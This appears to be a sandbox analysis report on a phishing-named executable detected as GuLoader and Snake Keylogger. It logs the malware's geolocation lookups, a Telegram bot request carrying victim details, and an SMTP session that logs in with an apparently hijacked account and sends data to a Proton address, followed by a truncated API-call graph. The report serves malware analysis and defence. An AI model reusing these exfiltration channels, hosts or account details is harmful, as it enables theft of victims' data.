Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 51067 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6256 | Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:16 UTC | 87 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-16 15:51:17 UTC | 854 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:17 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24550
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dF0BCJsBobdOBYryLWqMAFWWOJLeVDZ9iKVhTUTOG1Eik%2F7NEZKGD%2FoKAiWIt7%2BXBN0W2wwHoW6msdbqhDVg0zIq4smExBQLdcbgFb3s%2Bl59deS16uGBWdieU3PTAYE12z%2B7DEg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a43b4ebc45ee-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2581105&cwnd=237&unsent_bytes=0&cid=e3bf705474e827fb&ts=203&x=0"
2024-11-16 15:51:17 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 51068 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6256 | Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:17 UTC | 63 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-16 15:51:18 UTC | 854 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:17 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24550
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YgTbh9mPo%2FYw43BN4oWCrh3QbOHQ%2FwGtmjp0uXFLQN8gWZhQoR%2B%2FktKUbn74sHINi0tPCsSlh0qQF3pA1bzi0E9Bwb2Xn1IgiWHbOPNdBlp6l%2BG8Uf63RaqtCZmRWikkiXxvsfdv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a441382c2cca-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1162&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2403319&cwnd=251&unsent_bytes=0&cid=f464a0ed1b8ef21c&ts=150&x=0"
2024-11-16 15:51:18 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 51070 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6256 | Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:19 UTC | 87 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-16 15:51:19 UTC | 852 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:19 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24552
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXjJde3lo2qCKeI198ui2%2BInqh2E4ZS6YZQ3pmwbly4vk1k1nWc1eBmGpPZgf2P4SS%2BVJ9p8BNSBIrFVfs2zci1GZJ1rjCeP5M%2Bo%2FGhaQ2ex1Wg3QylTYv0JxwUUZ7Jz4GBY6mNA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a44a1c196c79-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=5444&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1526620&cwnd=251&unsent_bytes=0&cid=e068a8b29423aba0&ts=162&x=0"
2024-11-16 15:51:19 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 51072 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6256 | Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:20 UTC | 63 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-16 15:51:20 UTC | 850 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:20 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24553
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPhukyeMheEUzd0AWbtmZWmb577Hr7533r05v0%2Btd3nl9MTPQ5DgFiB5pAiZxyqihMoS%2FBOqQy7fNVuE7P9u200nv6FVDXoWpaSFWvYAMV9KB45a29iHz%2BJG1LNN2EMdzwLGj4TQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a4538856ddaf-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1053&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2693953&cwnd=252&unsent_bytes=0&cid=70898dc7a9345faf&ts=149&x=0"
2024-11-16 15:51:20 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 51074 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6256 | Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:22 UTC | 63 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-16 15:51:22 UTC | 846 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:22 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24555
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUisO6i64fvyclqei8uihw36KD0qe7WEj%2Fgbal13VWBJXJj0lBJC0fzkTBvYa9HSrpKgN5sj5J6foLchcSn6Tsuo4lQvTEYH0oWeECPs7jh61E5CQP6YLaFD0EA9Us78uff2oO6R"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a45e3fc64638-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2030855&cwnd=251&unsent_bytes=0&cid=c28fcfe923513c8d&ts=228&x=0"
2024-11-16 15:51:22 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 51076 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6256 | Process: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:24 UTC | 63 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-16 15:51:24 UTC | 858 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:24 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24557
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BjmHVr%2FjrOnhCh%2BjkXSzLfjgqmZ4gNnBvVxWlyTlXQ5ifgu2pdUFId%2BuQji0ZVEUui9JX3MBnb1L%2BAzXPeZfjKx4nxvc%2BOyOX0h5MfAUp8IG8%2FJD0nJN9zltiNrFb5ovIStfN3a"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a467ba870beb-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1550&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1845761&cwnd=251&unsent_bytes=0&cid=bfb40c29a3ae5db0&ts=161&x=0"
2024-11-16 15:51:24 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 51078 | 188.114.97.3 | 443 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:25 UTC | 63 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-16 15:51:25 UTC | 848 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:25 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24558
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zYYy%2Bl8QbnOtZCJ7LRRCk8QGDF6cpfP0XYzldVjelSBSmdIC%2BLbnPjZhhmZ0kEqTketaaFs2DsayWx1aktwW4TyOepzo663328d3FIm2smaJQKuTwBuCs1zHDWV0Hbir7daIYZTd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a4723d142e75-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1941&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1852847&cwnd=245&unsent_bytes=0&cid=7e98d56a8976e6f5&ts=152&x=0"
2024-11-16 15:51:25 UTC | 359 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 51080 | 188.114.97.3 | 443 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:27 UTC | 87 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-16 15:51:27 UTC | 850 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:27 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24560
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRe%2Flc1x4UyVSaVARpbQ5XP14V5FCyw9G1FmOUki0XxsfobvmPYydLVhmp3d9dlxzkHCGnag51KEV%2FDXaYpNi26psDYHoX7qZWvsAtEUQudOnWJAcOYzaSRFFy2zOjVaewHcqIH%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a47b1c2da924-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1371&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1971409&cwnd=201&unsent_bytes=0&cid=3214b4eced1eee82&ts=159&x=0"
2024-11-16 15:51:27 UTC | 359 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 51082 | 188.114.97.3 | 443 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:28 UTC | 63 | OUT | GET /xml/173.254.250.69 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-16 15:51:28 UTC | 854 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:28 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 24561
Last-Modified: Sat, 16 Nov 2024 09:02:07 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWJJxbxu8uC5RCmEQqF3IMD6ZYvCE20Im8Mjf71sYOzkjOQpmGDWmUv8b%2FrcJLLxv%2FhdMuZZAVf%2BXuz24K72dF6G321Lksb0Km2e74uW9OVOmj2h%2Bcpww8qAVhx%2BR3zWZA9j40PL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e38a4845944a912-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1474&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2065620&cwnd=159&unsent_bytes=0&cid=a94c65231bb5882d&ts=148&x=0"
2024-11-16 15:51:28 UTC | 359 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 51083 | 149.154.167.220 | 443 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-16 15:51:29 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-11-16 15:51:29 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Sat, 16 Nov 2024 15:51:29 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-16 15:51:29 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 16, 2024 16:51:36.903776884 CET | 587 | 51084 | 37.27.123.72 | 192.168.2.5 | 220-server42.hndservers.net ESMTP Exim 4.98 #2 Sat, 16 Nov 2024 20:51:36 +0500
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 16, 2024 16:51:36.904170990 CET | 51084 | 587 | 192.168.2.5 | 37.27.123.72 | EHLO 473627
Nov 16, 2024 16:51:37.156805038 CET | 587 | 51084 | 37.27.123.72 | 192.168.2.5 | 250-server42.hndservers.net Hello 473627 [173.254.250.69]
250-SIZE 104857600
250-LIMITS MAILMAX=1000 RCPTMAX=50000
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Nov 16, 2024 16:51:37.158248901 CET | 51084 | 587 | 192.168.2.5 | 37.27.123.72 | AUTH login d2FqYWhhdEBmb29kZXguY29tLnBr
Nov 16, 2024 16:51:37.410407066 CET | 587 | 51084 | 37.27.123.72 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Nov 16, 2024 16:51:37.711673975 CET | 587 | 51084 | 37.27.123.72 | 192.168.2.5 | 235 Authentication succeeded
Nov 16, 2024 16:51:37.712052107 CET | 51084 | 587 | 192.168.2.5 | 37.27.123.72 | MAIL FROM:<wajahat@foodex.com.pk>
Nov 16, 2024 16:51:37.964631081 CET | 587 | 51084 | 37.27.123.72 | 192.168.2.5 | 250 OK
Nov 16, 2024 16:51:37.965051889 CET | 51084 | 587 | 192.168.2.5 | 37.27.123.72 | RCPT TO:<millions1000@proton.me>
Nov 16, 2024 16:51:38.233315945 CET | 587 | 51084 | 37.27.123.72 | 192.168.2.5 | 250 Accepted
Nov 16, 2024 16:51:38.233643055 CET | 51084 | 587 | 192.168.2.5 | 37.27.123.72 | DATA
Nov 16, 2024 16:51:38.486479998 CET | 587 | 51084 | 37.27.123.72 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
Nov 16, 2024 16:51:38.487607956 CET | 51084 | 587 | 192.168.2.5 | 37.27.123.72 | .
Nov 16, 2024 16:51:39.065809011 CET | 587 | 51084 | 37.27.123.72 | 192.168.2.5 | 250 OK id=1tCL5G-0000000Dy09-2Di9


Target ID: 0
Start time: 10:50:00
Start date: 16/11/2024
Path: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
Imagebase: 0x400000
File size: 833'904 bytes
MD5 hash: A7071C7CF3999B13607413C36E8D5418
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2666489951.000000000839D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 4
Start time: 10:50:58
Start date: 16/11/2024
Path: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"
Imagebase: 0x400000
File size: 833'904 bytes
MD5 hash: A7071C7CF3999B13607413C36E8D5418
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false


Execution Graph

Execution Coverage: 19.6%
Dynamic/Decrypted Code Coverage: 15.2%
Signature Coverage: 18.9%
Total number of Nodes: 1510
Total number of Limit Nodes: 47

[execution_graph: serialized node/edge listing of the rendered call graph (node ids, code addresses and resolved API names such as GlobalAlloc, VirtualProtect, FindWindowExW, SendMessageTimeoutW and GetDiskFreeSpaceW); the graph image itself is not recoverable from the text, and the listing is cut off at the end of the page]
402b3a 18 API calls 5181->5182 5183 4019df 5182->5183 5184 4019e6 lstrcmpiW 5183->5184 5185 4019f8 lstrcmpW 5183->5185 5186 4019ec 5184->5186 5185->5186 4273 401e51 4274 402b3a 18 API calls 4273->4274 4275 401e57 4274->4275 4276 405194 25 API calls 4275->4276 4277 401e61 4276->4277 4291 405665 CreateProcessW 4277->4291 4280 401ec6 CloseHandle 4284 402793 4280->4284 4281 401e77 WaitForSingleObject 4282 401e89 4281->4282 4283 401e9b GetExitCodeProcess 4282->4283 4294 40628d 4282->4294 4285 401eba 4283->4285 4286 401ead 4283->4286 4285->4280 4289 401eb8 4285->4289 4298 405e31 wsprintfW 4286->4298 4289->4280 4292 401e67 4291->4292 4293 405694 CloseHandle 4291->4293 4292->4280 4292->4281 4292->4284 4293->4292 4295 4062aa PeekMessageW 4294->4295 4296 4062a0 DispatchMessageW 4295->4296 4297 401e90 WaitForSingleObject 4295->4297 4296->4295 4297->4282 4298->4289 4373 401752 4374 402b3a 18 API calls 4373->4374 4375 401759 4374->4375 4376 401781 4375->4376 4377 401779 4375->4377 4413 405eea lstrcpynW 4376->4413 4412 405eea lstrcpynW 4377->4412 4380 40177f 4384 40617e 5 API calls 4380->4384 4381 40178c 4382 405935 3 API calls 4381->4382 4383 401792 lstrcatW 4382->4383 4383->4380 4401 40179e 4384->4401 4385 40622d 2 API calls 4385->4401 4386 405b31 2 API calls 4386->4401 4388 4017b0 CompareFileTime 4388->4401 4389 401870 4391 405194 25 API calls 4389->4391 4390 401847 4392 405194 25 API calls 4390->4392 4410 40185c 4390->4410 4394 40187a 4391->4394 4392->4410 4393 405eea lstrcpynW 4393->4401 4395 403062 46 API calls 4394->4395 4396 40188d 4395->4396 4397 4018a1 SetFileTime 4396->4397 4398 4018b3 CloseHandle 4396->4398 4397->4398 4400 4018c4 4398->4400 4398->4410 4399 405f0c 18 API calls 4399->4401 4402 4018c9 4400->4402 4403 4018dc 4400->4403 4401->4385 4401->4386 4401->4388 4401->4389 4401->4390 4401->4393 4401->4399 4406 4056c6 MessageBoxIndirectW 4401->4406 4411 405b56 GetFileAttributesW CreateFileW 4401->4411 4404 405f0c 18 API calls 4402->4404 4405 405f0c 18 API calls 
4403->4405 4407 4018d1 lstrcatW 4404->4407 4408 4018e4 4405->4408 4406->4401 4407->4408 4409 4056c6 MessageBoxIndirectW 4408->4409 4409->4410 4411->4401 4412->4380 4413->4381 4414 402253 4415 402261 4414->4415 4416 40225b 4414->4416 4417 40226f 4415->4417 4419 402b3a 18 API calls 4415->4419 4418 402b3a 18 API calls 4416->4418 4420 402b3a 18 API calls 4417->4420 4422 40227d 4417->4422 4418->4415 4419->4417 4420->4422 4421 402b3a 18 API calls 4423 402286 WritePrivateProfileStringW 4421->4423 4422->4421 5187 4052d3 5188 4052f4 GetDlgItem GetDlgItem GetDlgItem 5187->5188 5189 40547f 5187->5189 5232 404164 SendMessageW 5188->5232 5190 4054b0 5189->5190 5191 405488 GetDlgItem CreateThread CloseHandle 5189->5191 5194 4054db 5190->5194 5195 405500 5190->5195 5196 4054c7 ShowWindow ShowWindow 5190->5196 5191->5190 5193 405365 5198 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5193->5198 5197 40553b 5194->5197 5200 405515 ShowWindow 5194->5200 5201 4054ef 5194->5201 5202 404196 8 API calls 5195->5202 5234 404164 SendMessageW 5196->5234 5197->5195 5205 405549 SendMessageW 5197->5205 5203 4053db 5198->5203 5204 4053bf SendMessageW SendMessageW 5198->5204 5207 405535 5200->5207 5208 405527 5200->5208 5206 404108 SendMessageW 5201->5206 5213 40550e 5202->5213 5210 4053e0 SendMessageW 5203->5210 5211 4053ee 5203->5211 5204->5203 5212 405562 CreatePopupMenu 5205->5212 5205->5213 5206->5195 5209 404108 SendMessageW 5207->5209 5214 405194 25 API calls 5208->5214 5209->5197 5210->5211 5216 40412f 19 API calls 5211->5216 5215 405f0c 18 API calls 5212->5215 5214->5207 5217 405572 AppendMenuW 5215->5217 5218 